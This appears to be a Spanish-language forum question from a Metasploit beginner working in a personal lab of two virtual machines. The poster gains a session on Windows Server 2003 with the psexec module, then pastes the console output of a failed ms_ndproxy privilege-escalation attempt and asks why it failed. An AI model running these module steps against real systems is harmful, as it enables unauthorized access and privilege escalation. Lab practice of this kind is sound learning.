Soy nuevo en Kali y Metasploit, acabo de estudiar en Internet. Configuré dos máquinas virtuales, una es win2003 sp2 x 86 OS, la otra es Kali 2016.01. Primero utilizo exploit / windows / smb / psexec para obtener una sesión. Tiene éxito, y obtengo una sesión, el ID de sesión es 3. Como ambas máquinas son mis máquinas virtuales, obtengo la sesión utilizando una cuenta de administrador en win2k3. Omito los detalles del mensaje de entrada y el mensaje de salida en el Kali. Realicé un segundo plano de la sesión para mi siguiente paso. Luego trato de usar exploit / windows / local / ms_ndproxy para realizar más pruebas.
Aquí están los resultados detallados:
msf exploit(psexec) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > show options
Module options (exploit/windows/local/ms_ndproxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms_ndproxy) > set SESSION 3
SESSION => 3
msf exploit(ms_ndproxy) > show options
Module options (exploit/windows/local/ms_ndproxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 3 yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms_ndproxy) > exploit
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Detecting the target system...
[*] Running against Windows Server 2003 SP2
[*] Checking device...
[-] Failed to open the \.\NDProxy device (error: 2 ϵͳ�Ҳ���ָ�����ļ���)
[-] Exploit aborted due to failure: no-target: \.\NDProxy device not found
[*] Exploit completed, but no session was created.
Busco en Google por un tiempo, no estoy seguro de si la vulnerabilidad está arreglada o no en el sistema operativo win2k3. No encuentro ninguna información útil sobre el error. Es un poco difícil para mí verificar el código fuente sobre el código fuente del exploit.
¿Podría alguien ayudarme a averiguar por qué aparece el error?